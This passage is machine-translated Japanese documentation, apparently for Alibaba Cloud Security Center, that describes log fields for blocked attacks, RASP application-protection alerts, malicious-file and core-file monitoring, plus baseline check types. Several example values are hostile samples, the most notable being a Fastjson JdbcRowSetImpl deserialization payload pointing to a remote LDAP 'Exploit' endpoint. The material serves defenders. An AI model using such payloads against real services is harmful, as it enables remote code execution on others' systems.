rule_type | ブロックされたイベントで使用されるルールのタイプ。 有効な値:
| alinet_payload |
instance_id | 攻撃されたアセットのインスタンスID。 | i-2zeg4zldn8zypsfg **** |
internet_ip | 攻撃されたアセットのパブリックIPアドレス。 | 39.104.XX.XX |
intranet_ip | 攻撃されたアセットのプライベートIPアドレス。 | 192.168.XX.XX |
モデル | 防衛アクション。 値はブロックとして固定されます。 値は、攻撃がブロックされていることを示します。 | block |
payload | 16進ペイロード。 | 504f5354202f20485454502f312e310d0a436f6e74656e742d547970653a20746578742f706c61696e0d0a557365722d4167656e743a20 **** |
ピッド | 攻撃されたプロセスのID。 | 7107 |
platform | 攻撃されたアセットのオペレーティングシステムのタイプ。 有効な値:
| linux |
proc_path | 攻撃されたプロセスへのパス。 | /usr/sbin/nginx |
sas_group_name | セキュリティセンター内のサーバーが属するアセットグループ。 | default |
src_ip | 攻撃の送信元IPアドレス。 | 106.11.XX.XX |
src_port | 攻撃の送信元ポート。 | 29575 |
uuid | サーバーのUUID。 | 5d83b26b-b7ca-4a0a-9267-12 **** |
アプリケーション保護ログ
フィールド名 | 説明 | 例 |
app_dir | アプリケーションが保存されているディレクトリ。 | /usr/local/aegis/rasp/apps/1111 |
app_id | アプリケーションの ID | 6492a391fc9b4e2aad94 **** |
app_name | アプリケーションの名前。 | test |
自信 | 検出アルゴリズムの信頼レベル。 有効な値:
| low |
content | リクエストボディに関する情報。 | {"@ type":" com.sun.rowset.JdbcRowSetImpl ","dataSourceName":"ldap:// 172.220.XX.XX.XX:1389/Exploit","autoCommit":true} |
content_length | リクエスト本文の長さ。 | 112 |
data | フック。 | {"cmd":"bash -c kill -0 -- -'31098'"} |
headers | リクエストヘッダーに関する情報。 | {"content-length":"112","referer":"http:// 120.26.XX.XX:8080 /デモ /シリアル","accept-language":"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2","origin":"http:// 120.26.XX.XX:8080" 、"host":"120.26.XX.XX:8080" 、"content-type":"application/json" 、"connection":"keep-alive" 、"x-forwarded-for":"1.1.XX.XX" 、"accept-encoding":"gzip、deflate","user-agent":"msnbot","accept":"application/json, text/plain, */*"} |
hostname | ホストまたはネットワークデバイスの名前。 | testthostname |
ip | ホストのプライベート IP アドレス。 | 172.16.XX.XX |
is_cliped | 長すぎるためにログが切り捨てられるかどうかを示します。 有効な値:
| false |
jdk | JDKのバージョン。 | 1.8.0_292 |
message | アラートの説明。 | 安全でないクラスシリアル。 |
method | リクエストのメソッド。 | Post |
os | オペレーティングシステムのタイプ。 | Linux |
os_arch | オペレーティングシステムのアーキテクチャ。 | amd64 |
os_version | オペレーティングシステムのカーネルバージョン。 | 3.10.0-1160.59.1。el7.x86_64 |
param | リクエストパラメーター。 ほとんどの場合、パラメーターは次のいずれかの形式になります。
| {"url":["http:// 127.0.0.1.xip.io"]} |
payload | 攻撃ペイロード。 | bash -c kill -0 -- '31098' |
payload_length | 攻撃ペイロードの長さ。 | 27 |
rasp_id | Runtime Application Self Protection (RASP) エージェントのID。 | fa00223c8420e256c0c98ca0bd0d **** |
rasp_version | RASPエージェントのバージョン。 | 0.4.3 |
リモート | リクエストが開始されたIPアドレス。 | 172.0.XX.XX |
result | アラートの処理結果。 有効な値:
| block |
rule_result | アプリケーション保護ルールで指定されているアラート処理アクション。 有効な値:
| block |
severity | リスクレベル。 有効な値:
| high |
stacktrace | スタック情報。 | [java.io.FileInputStream.<init>(FileInputStream.java:123) 、java.io.FileInputStream.<init>(FileInputStream.java:93) 、com.example.vulns.controller.FileController.IORead(FileController.java:75) 、sun.reflect. NativeMethodAccessorsun. 62)......] |
time | アラートが生成された時刻。 | 2023-10-09 15:19:15 |
timestamp | アラートが生成されたときのタイムスタンプ。 単位:ミリ秒。 | 1696835955070 |
type | 脆弱性のタイプ。 有効な値:
| rce |
url | リクエストのURL。 | http:// 127.0.0.1:999/xxx |
rasp_attack_uuid | 脆弱性のUUID。 | 18823b23-7ad4-47c0-b5ac-e5f036a2 **** |
uuid | ホストのUUID。 | 23f7ca61-e271-4a8e-bf5f-165596a16 **** |
internet_ip | インスタンスのパブリック IP アドレスです。 | 1.2.XX.XX |
intranet_ip | ホストのプライベート IP アドレス。 | 172.16.XX.XX |
sas_group_name | セキュリティセンター内のサーバーが属するグループ。 | グループ1 |
instance_id | ホストのインスタンスID。 | i-wz995eivg28f1m** |
悪意のあるファイル検出ログ
フィールド名 | 説明 | 例 |
bucket_name | バケットの名前です。 | ***-テスト |
event_id | アラートの ID。 | 802210 |
event_name | アラートの名前。 | マイニングプログラム |
md5 | ファイルのMD5値。 | 6bc2bc ****** 53d409b1 |
sha256 | ファイルのSHA-256ハッシュ値。 | f038f9525 ****** 7772981e87f85 |
result | 検出結果。
| 0 |
file_path | ファイルへのパス。 | test.zip/bin_test |
etag | OSSオブジェクトのID。 | 6BC2B ****** 853D409B1 |
risk_level | リスクレベル。
| 思い出させる |
source | チェック方法。
| OSS |
parent_md5 | 親ファイルまたは圧縮パッケージファイルのMD5ハッシュ値。 | 3d0f8045bb9 ****** |
parent_sha256 | 親ファイルまたは圧縮パッケージファイルのSHA-256ハッシュ値。 | 69b643d6 ****** a3fb859fa |
parent_file_path | 親ファイルまたは圧縮パッケージファイルの名前。 | test.zip |
start_time | 検出開始時のタイムスタンプ。 単位は秒です。 | 1718678414 |
コアファイル監視イベントログ
フィールド名 | 説明 | 例 |
start_time | イベントが最後に発生したときのタイムスタンプ。 単位は秒です。 | 1718678414 |
uuid | サーバーのUUID。 | 5d83b26b-b **a-4** a-9267-12 **** |
file_path | ファイルへのパス。 | /etc/passwd |
proc_path | プロセスへのパス。 | /usr/bin/bash |
rule_id | ヒットルールのID。 | 123 |
rule_name | ルールの名前を設定します。 | file_test_rule |
cmdline | コマンドライン。 | bash /opt/a |
operation | ファイルに対して実行する操作。 | 読み取り |
risk_level | リスクレベル。 | 2 |
ピッド | プロセスID。 | 45324 |
proc_permission | プロセスを実行するための権限。 | rwxrwxrwx |
instance_id | インスタンス ID 。 | i-wz995eivg2 **** |
internet_ip | IP アドレスです。 | 192.0.2.1 |
intranet_ip | プライベートIPアドレス。 | 172.16.0.1 |
instance_name | インスタンス名。 | aegis-テスト |
platform | オペレーティングシステムの種類。 | Linux |
付録
ベースラインタイプとサブタイプ
タイプ | サブタイプ | 説明 |
hc_exploit | hc_exploit_redis | 高リスクのエクスプロイト-Redis不正アクセス高エクスプロイトの脆弱性リスク |
hc_exploit_activemq | 高リスクエクスプロイト-ActiveMQ不正アクセス高エクスプロイト脆弱性リスク | |
hc_exploit_couchdb | 高リスクエクスプロイト-CouchDB不正アクセス高エクスプロイトリスク | |
hc_exploit_docker | 高リスクエクスプロイト-Docker不正アクセス高脆弱性リスク | |
hc_exploit_es | 高リスクエクスプロイト-Elasticsearch不正アクセス高エクスプロイト脆弱性リスク | |
hc_exploit_hadoop | 高リスクエクスプロイト-Hadoop不正アクセス高エクスプロイト脆弱性リスク | |
hc_exploit_jboss | 高リスクエクスプロイト-Jboss不正アクセス高エクスプロイト脆弱性リスク | |
hc_exploit_jenkins | 高リスクエクスプロイト-Jenkins不正アクセス高エクスプロイト脆弱性リスク | |
hc_exploit_k8s_api | 高リスクエクスプロイト-Kubernetes Apiserver不正アクセス高エクスプロイト脆弱性リスク | |
hc_exploit_ldap | 高リスクエクスプロイト-LDAP不正アクセス高エクスプロイト脆弱性リスク (Windows) | |
hc_exploit_ldap_linux | 高リスクのエクスプロイト-OpenLDAP不正アクセスの脆弱性ベースライン (Linux) | |
hc_exploit_memcache | 高リスクエクスプロイト-Memcached不正アクセス高エクスプロイト脆弱性リスク | |
hc_exploit_mongo | 高リスクエクスプロイト-Mongodb不正アクセス高エクスプロイト脆弱性リスク | |
hc_exploit_pgsql | 高リスクエクスプロイト-高リスクベースラインへのPostgresql不正アクセス | |
hc_exploit_rabbitmq | 高リスクエクスプロイト-RabbitMQ不正アクセス高エクスプロイト脆弱性リスク | |
hc_exploit_rsync | 高リスクエクスプロイト-rsync不正アクセス高エクスプロイト脆弱性リスク | |
hc_exploit_tomcat | 高リスクのエクスプロイト-Apache Tomcat AJPファイルの読み取り /包含の脆弱性 | |
hc_exploit_zookeeper | 高リスクのエクスプロイト-ZooKeeper不正アクセス高エクスプロイトの脆弱性リスク | |
hc_container | hc_docker | Alibaba Cloud Standard - Dockerセキュリティベースラインチェック |
hc_middleware_ack_master | Kubernetes(ACK) マスターが国際的に合意したセキュリティのベストプラクティス | |
hc_middleware_ack_node | Kubernetes(ACK) ノードのセキュリティに関する国際的なベストプラクティス | |
hc_middleware_k8s | Alibaba Cloud Standard-Kubernetes-マスターセキュリティベースラインチェック | |
hc_middleware_k8s_node | Alibaba Cloud Standard-Kubernetes-ノードセキュリティベースラインチェック | |
シス | hc_suse 15_djbh | SUSE Linux 15中国機密保護のためのベースライン-レベルIII |
hc_aliyun_linux3_djbh_l3 | 中国機密保護のためのAlibaba Cloud Linux 3ベースライン-レベルIII | |
hc_aliyun_linux_djbh_l3 | Alibaba Cloud Linux/Aliyun Linux 2ベースライン、中国機密保護のサイバーセキュリティ保護-レベルIII | |
hc_bind_djbh | サイバーセキュリティの中国のレベル3保護-バインドコンプライアンスベースラインチェック | |
hc_centos 6_djbh_l3 | CentOS Linux 6サイバーセキュリティの中国分類保護のためのベースライン-レベルIII | |
hc_centos 7_djbh_l3 | CentOS Linux 7中国機密保護のためのベースライン-レベルIII | |
hc_centos 8_djbh_l3 | CentOS Linux 8中国のサイバーセキュリティ保護のためのベースライン-レベルIII | |
hc_debian_djbh_l3 | Debian Linux 8/9/10中国のサイバーセキュリティ保護のためのベースライン-レベルIII | |
hc_iis_djbh | サイバーセキュリティの中国分類保護のためのIISベースライン-レベルIII | |
hc_informix_djbh | サイバーセキュリティの中国のレベル3保護-Informixコンプライアンスベースラインチェック | |
hc_jboss_djbh | 中国のサイバーセキュリティのレベル3保護-Jboss6/7コンプライアンスベースラインチェック | |
hc_mongo_djbh | 中国のためのMongoDBベースラインはサイバーセキュリティの保護を分類しました-レベルIII | |
hc_mssql_djbh | 中国のサイバーセキュリティのレベル3保護-SQL Server Compliance Baseline Check | |
hc_mysql_djbh | 等しい保証レベル3-MySqlコンプライアンスベースラインチェック | |
hc_nginx_djbh | 同等保証レベル3-Nginxコンプライアンスベースラインチェック | |
hc_oracle_djbh | 中国のサイバーセキュリティのレベル3保護-Oracle Compliance Baseline Check | |
hc_pgsql_djbh | レベル3-PostgreSqlコンプライアンスベースラインチェック | |
hc_redhat 6_djbh_l3 | 中国のサイバーセキュリティのレベル3保護-Red Hat Enterprise Linux 6 Compliance Baseline Check | |
hc_redhat_djbh_l3 | 中国のサイバーセキュリティのレベル3保護-Red Hat Enterprise Linux 7 Compliance Baseline Check | |
hc_redis_djbh | サイバーセキュリティの保護を分類した中国のRedisベースライン-レベルIII | |
hc_suse 10_djbh_l3 | SUSE Linux 10サイバーセキュリティの中国機密保護のためのベースライン-レベルIII | |
hc_suse 12_djbh_l3 | SUSE Linux 12サイバーセキュリティの中国機密保護のためのベースライン-レベルIII | |
hc_suse_djbh_l3 | SUSE Linux 11サイバーセキュリティの中国機密保護のためのベースライン-レベルIII | |
hc_ubuntu 14_djbh_l3 | サイバーセキュリティの保護を分類した中国のUbuntu 14ベースライン-レベルIII | |
hc_ubuntu_djbh_l3 | レベル3-Ubuntu 16/18/20コンプライアンス規制検査待ち | |
hc_was_djbh | 中国のサイバーセキュリティのレベル3保護-Websphere Application Server Compliance Baseline Check | |
hc_weblogic_djbh | サイバーセキュリティの保護を分類した中国のWeblogicベースライン-レベルIII | |
hc_win 2008_djbh_l3 | 中国のレベル3のサイバーセキュリティ保護-Windows Server 2008 R2コンプライアンスベースラインチェック | |
hc_win 2012_djbh_l3 | サイバーセキュリティの中国分類保護のためのWindows 2012 R2ベースライン-レベルIII | |
hc_win 2016_djbh_l3 | サイバーセキュリティの中国分類保護のためのWindows 2016/2019ベースライン-レベルIII | |
hc_aliyun_linux_djbh_l2 | Alibaba Cloud Linux/Aliyun Linux 2ベースライン、中国機密保護のサイバーセキュリティ保護-レベルII | |
hc_centos 6_djbh_l2 | CentOS Linux 6中国機密保護のためのベースライン-レベルII | |
hc_centos 7_djbh_l2 | CentOS Linux 7中国機密保護のためのベースライン-レベルII | |
hc_debian_djbh_l2 | Debian Linux 8中国のサイバーセキュリティ保護のためのベースライン-レベルII | |
hc_redhat 7_djbh_l2 | Redhat Linux 7中国のサイバーセキュリティ保護のためのベースライン-レベルII | |
hc_ubuntu_djbh_l2 | Linux Ubuntu 16/18中国のサイバーセキュリティ保護のためのベースライン-レベルII | |
hc_win 2008_djbh_l2 | サイバーセキュリティの中国分類保護のためのWindows 2008 R2ベースライン-レベルII | |
hc_win 2012_djbh_l2 | サイバーセキュリティの中国分類保護のためのWindows 2012 R2ベースライン-レベルII | |
hc_win 2016_djbh_l2 | サイバーセキュリティの中国分類保護のためのWindows 2016/2019ベースライン-レベルII | |
hc_aliyun_linux_cis | Alibaba Cloud Linux 2国際的に合意されたセキュリティのベストプラクティス | |
hc_centos 6_cis_rules | CentOS Linux 6 LTS国際的に合意されたセキュリティのベストプラクティス | |
hc_centos 7_cis_rules | CentOS Linux 7 LTS国際的に合意されたセキュリティのベストプラクティス | |
hc_centos 8_cis_rules | CentOS Linux 8 LTSセキュリティに関する国際的なベストプラクティス | |
hc_debian 8_cis_rules | Debian Linux 8国際的に合意されたセキュリティのベストプラクティス | |
hc_ubuntu 14_cis_rules | Ubuntu 14 LTS国際的に合意されたセキュリティのベストプラクティス | |
hc_ubuntu 16_cis_rules | Ubuntu 16/18/20 LTSセキュリティに関する国際的なベストプラクティス | |
hc_win 2008_cis_rules | Windows Server 2008 R2セキュリティに関する国際的なベストプラクティス | |
hc_win 2012_cis_rules | Windows Server 2012 R2セキュリティに関する国際的なベストプラクティス | |
hc_win 2016_cis_rules | Windows Server 2016/2019 R2セキュリティに関する国際的なベストプラクティス | |
hc_kylin_djbh_l3 | 中国のサイバーセキュリティのレベル3保護-Kylin Compliance Baseline Check | |
hc_uos_djbh_l3 | 中国のサイバーセキュリティのレベル3保護-uosコンプライアンスベースラインチェック | |
hc_best_security | hc_aliyun_linux | Alibaba Cloud Linux/Aliyun Linux 2ベンチマーク |
hc_centos 6 | Alibaba Cloud Standard - CentOS Linux 6セキュリティベースラインチェック | |
hc_centos 7 | Alibaba Cloud Standard - CentOS Linux 7/8セキュリティベースラインチェック | |
hc_debian | Alibaba Cloud Standard - Debian Linux 8/9/10セキュリティベースライン | |
hc_redhat 6 | Alibaba Cloud Standard - Red Hat Enterprise Linux 6セキュリティベースラインチェック | |
hc_redhat 7 | Alibaba Cloud Standard - Red Hat Enterprise Linux 7/8セキュリティベースラインチェック | |
hc_ubuntu | Alibaba Cloud Standard - Ubuntuセキュリティベースライン | |
hc_windows_2008 | Alibaba Cloud Standard - Windows Server 2008 R2セキュリティベースラインチェック | |
hc_windows_2012 | Alibaba Cloud Standard - Windows 2012 R2セキュリティベースライン | |
hc_windows_2016 | Alibaba Cloud Standard - Windows 2016/2019セキュリティベースライン | |
hc_db_mssql | Alibaba Cloud Standard-SQL Serverセキュリティベースラインチェック | |
hc_memcached_ali | Alibaba Cloud Standard - Memcachedセキュリティベースラインチェック | |
hc_mongodb | Alibaba Cloud Standard - MongoDBバージョン3.xセキュリティベースラインチェック | |
hc_mysql_ali | Alibaba Cloud Standard - Mysqlセキュリティベースラインチェック | |
hc_oracle | Alibaba Cloud Standard - Oracle 11g Security Baseline Check | |
hc_pgsql_ali | Alibaba Cloud Standard-PostgreSqlセキュリティ初期化チェック | |
hc_redis_ali | Alibaba Cloud Standard - Redisセキュリティベースラインチェック | |
hc_apache | Alibaba Cloud Standard - Apache Security Baseline Check | |
hc_iis_8 | Alibaba Cloud Standard - IIS 8セキュリティベースラインチェック | |
hc_nginx_linux | Alibaba Cloud Standard - Nginxセキュリティベースラインチェック | |
hc_suse 15 | Alibaba Cloud Standard - SUSE Linux 15セキュリティベースラインチェック | |
tomcat 7 | Alibaba Cloud Standard-Apache Tomcatセキュリティベースライン | |
weak_password | hc_mongodb_pwd | Weak Password-MongoDB Weak Password baseline (バージョン2をサポート) X) |
hc_weakpwd_ftp_linux | 弱いパスワード-Ftpログイン弱いパスワードのベースライン | |
hc_weakpwd_linux_sys | 弱いパスワード-Linuxシステムログイン弱いパスワードベースライン | |
hc_weakpwd_mongodb 3 | 弱いパスワード-MongoDB弱いパスワードベースライン | |
hc_weakpwd_mssql | 弱いパスワード-SQL Server DBログイン弱いパスワードベースライン | |
hc_weakpwd_mysql_linux | 弱いパスワード-Mysql DBログイン弱いパスワードベースライン | |
hc_weakpwd_mysql_win | 弱いパスワード-Mysql DBログイン弱いパスワードベースライン (Windowsバージョン) | |
hc_weakpwd_openldap | 弱いパスワード-Openldapログイン弱いパスワードベースライン | |
hc_weakpwd_oracle | Weak Password-Oracleログインの弱いパスワード検出 | |
hc_weakpwd_pgsql | 弱いパスワード-PostgreSQL DBログイン弱いパスワードベースライン | |
hc_weakpwd_pptp | 弱いパスワード-pptpdログイン弱いパスワードのベースライン | |
hc_weakpwd_redis_linux | 弱いパスワード-Redis DBログイン弱いパスワードベースライン | |
hc_weakpwd_rsync | 弱いパスワード-rsyncログイン弱いパスワードベースライン | |
hc_weakpwd_svn | 弱いパスワード-svnログイン弱いパスワードのベースライン | |
hc_weakpwd_tomcat_linux | 弱いパスワード-Apache Tomcatコンソールの弱いパスワードのベースライン | |
hc_weakpwd_vnc | 弱いパスワード-VncServerの弱いパスワードチェック | |
hc_weakpwd_weblogic | 弱いパスワード-Weblogic 12cログイン弱いパスワード検出 | |
hc_weakpwd_win_sys | 弱いパスワード-Windowsシステムログイン弱いパスワードベースライン |